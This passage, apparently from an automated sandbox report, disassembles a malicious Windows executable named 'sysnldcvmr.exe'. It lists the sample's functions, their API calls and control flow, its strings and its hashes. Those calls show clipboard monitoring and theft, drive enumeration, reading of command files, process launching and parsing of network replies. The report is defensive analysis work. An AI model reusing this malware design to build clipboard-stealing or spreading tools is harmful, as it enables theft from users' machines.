                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                    • Opcode ID: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                                                                    • Opcode Fuzzy Hash: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                                                                    Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 161 405970-405992 GetWindowLongW 162 405994-40599b 161->162 163 4059b6-4059bd 161->163 164 4059a1-4059a5 162->164 165 405a27-405a38 IsClipboardFormatAvailable 162->165 166 4059e6-4059ec 163->166 167 4059bf 163->167 170 4059c4-4059e1 SetClipboardViewer SetWindowLongW 164->170 171 4059a7-4059ab 164->171 168 405a43-405a4d IsClipboardFormatAvailable 165->168 169 405a3a-405a41 165->169 173 405a06-405a0a 166->173 174 4059ee-405a04 SetWindowLongW 166->174 172 405ba4-405bbd DefWindowProcA 167->172 178 405a58-405a62 IsClipboardFormatAvailable 168->178 179 405a4f-405a56 168->179 177 405a6b-405a6f 169->177 170->172 180 4059b1 171->180 181 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 171->181 175 405a22 173->175 176 405a0c-405a1c SendMessageA 173->176 174->175 175->172 176->175 183 405a75-405a7f OpenClipboard 177->183 184 405b3f-405b43 177->184 178->177 182 405a64 178->182 179->177 180->172 181->172 182->177 183->184 187 405a85-405a96 GetClipboardData 183->187 185 405b45-405b55 SendMessageA 184->185 186 405b5b 184->186 185->186 186->172 188 405a98 187->188 189 405a9d-405aae GlobalLock 187->189 188->172 190 405ab0 189->190 191 405ab5-405ac6 189->191 190->172 192 405ac8-405acc 191->192 193 405ae9-405afc call 405690 191->193 194 405afe-405b0e call 4057b0 192->194 195 405ace-405ad2 192->195 201 405b11-405b25 GlobalUnlock CloseClipboard 193->201 194->201 197 405ad4 195->197 198 405ad6-405ae7 call 405570 195->198 197->201 198->201 201->184 205 405b27-405b3c call 404970 call 40a1b0 201->205 205->184
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3549449529-0
                                                                                                                    • Opcode ID: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                                                                    • Opcode Fuzzy Hash: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                                                                    Function 00406BC0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106sleepthreadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000104), ref: 00406BE0
                                                                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                      • Part of subcall function 004063A0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                    • String ID: (%dGB)$%s%s$C:\Windows\sysnldcvmr.exe$Unnamed volume
                                                                                                                    • API String ID: 1650488544-3455140397
                                                                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                                                                    Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 00405898
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                    • String ID: %x%X$0
                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68
                                                                                                                    Function 0040B2C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5), ref: 0040D4AA
                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                    • String ID: C:\Users\user\tbtnds.dat$Vz@
                                                                                                                    • API String ID: 439099756-3855154787
                                                                                                                    • Opcode ID: 8d7cde204a8a1769cbf9c31fa4a0dcac597e6b6dcc3230a668d142432fe62379
                                                                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                                                                    • Opcode Fuzzy Hash: 8d7cde204a8a1769cbf9c31fa4a0dcac597e6b6dcc3230a668d142432fe62379
                                                                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                                                                    Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 268 40e980-40e9e0 memset * 2 CreateProcessW 269 40e9f1-40ea15 ShellExecuteW 268->269 270 40e9e2-40e9ef Sleep 268->270 272 40ea26 269->272 273 40ea17-40ea24 Sleep 269->273 271 40ea28-40ea2b 270->271 272->271 273->271
                                                                                                                    APIs
                                                                                                                    • memset.NTDLL ref: 0040E98E
                                                                                                                    • memset.NTDLL ref: 0040E99E
                                                                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                    • String ID: $D$Gy@$open
                                                                                                                    • API String ID: 3787208655-4184347819
                                                                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59
                                                                                                                    Function 0040E7C0 Relevance: 16.6, APIs: 11, Instructions: 144fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 274 40e7c0-40e7ff CreateFileW 275 40e805-40e820 CreateFileMappingW 274->275 276 40e91a-40e91e 274->276 277 40e910-40e914 CloseHandle 275->277 278 40e826-40e83f MapViewOfFile 275->278 279 40e920-40e940 CreateFileW 276->279 280 40e974-40e97a 276->280 277->276 281 40e845-40e85b GetFileSize 278->281 282 40e906-40e90a CloseHandle 278->282 283 40e942-40e962 WriteFile CloseHandle 279->283 284 40e968-40e96c call 40a1b0 279->284 286 40e861-40e874 call 40c7f0 281->286 287 40e8fc-40e900 UnmapViewOfFile 281->287 282->277 283->284 288 40e971 284->288 286->287 291 40e87a-40e889 286->291 287->282 288->280 291->287 292 40e88b-40e8ab call 40c190 291->292 294 40e8b0-40e8ba 292->294 294->287 295 40e8bc-40e8e7 call 40a4e0 memcmp 294->295 295->287 298 40e8e9-40e8f5 call 40a1b0 295->298 298->287
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902698870-0
                                                                                                                    • Opcode ID: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                                                                    • Opcode Fuzzy Hash: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                                                                    Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 325 40d2d0-40d300 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 326 40d306-40d31a InterlockedExchangeAdd 325->326 327 40d3e9-40d400 GetCurrentThread SetThreadPriority 325->327 326->327 328 40d320-40d329 326->328 329 40d32c-40d333 328->329 329->327 330 40d339-40d354 EnterCriticalSection 329->330 331 40d35f-40d367 330->331 332 40d3a7-40d3bc LeaveCriticalSection 331->332 333 40d369-40d376 331->333 336 40d3c7-40d3cd 332->336 337 40d3be-40d3c5 332->337 334 40d383-40d3a5 WaitForSingleObject 333->334 335 40d378-40d381 333->335 338 40d356-40d35c 334->338 335->338 339 40d3dc-40d3e4 Sleep 336->339 340 40d3cf-40d3d8 336->340 337->327 338->331 339->329 340->339 341 40d3da 340->341 341->327
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,02190638,000000FF), ref: 0040D2DD
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,02190638,000000FF), ref: 0040D2EF
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3862671961-0
                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                                                                    Function 00405BC0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 360 405bc0-405bf2 InitializeCriticalSection CreateFileW 361 405ce5-405ce8 360->361 362 405bf8-405c13 CreateFileMappingW 360->362 363 405c19-405c32 MapViewOfFile 362->363 364 405cdb-405cdf CloseHandle 362->364 365 405cd1-405cd5 CloseHandle 363->365 366 405c38-405c4a GetFileSize 363->366 364->361 365->364 367 405c4d-405c51 366->367 368 405c53-405c5a 367->368 369 405cc7-405ccb UnmapViewOfFile 367->369 370 405c5c 368->370 371 405c5e-405c71 call 40c820 368->371 369->365 370->369 374 405c73 371->374 375 405c75-405c8a 371->375 374->369 376 405c9a-405cc5 call 405cf0 375->376 377 405c8c-405c98 call 40a1b0 375->377 376->367 377->369
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\tbtcmds.dat, xrefs: 00405BE0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat
                                                                                                                    • API String ID: 3956458805-1042172597
                                                                                                                    • Opcode ID: 0d31e8e54dd4377960fe8f85c90de5e8a1c48912456c97c5d368e4304b7c840c
                                                                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                                                                    • Opcode Fuzzy Hash: 0d31e8e54dd4377960fe8f85c90de5e8a1c48912456c97c5d368e4304b7c840c
                                                                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                                                                    Function 0040D890 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 382 40d890-40d8aa 383 40d8bb-40d8c2 382->383 384 40d974-40d97d 383->384 385 40d8c8-40d8e7 recvfrom 383->385 386 40d8f6-40d913 StrCmpNIA 385->386 387 40d8e9-40d8f4 Sleep 385->387 389 40d915-40d934 StrStrIA 386->389 390 40d96f 386->390 388 40d8ac-40d8b5 387->388 388->383 389->390 391 40d936-40d96d StrChrA call 40c8a0 389->391 390->388 391->390
                                                                                                                    APIs
                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.4115173089.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.4115130659.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115308368.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.4115355255.0000000000415000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
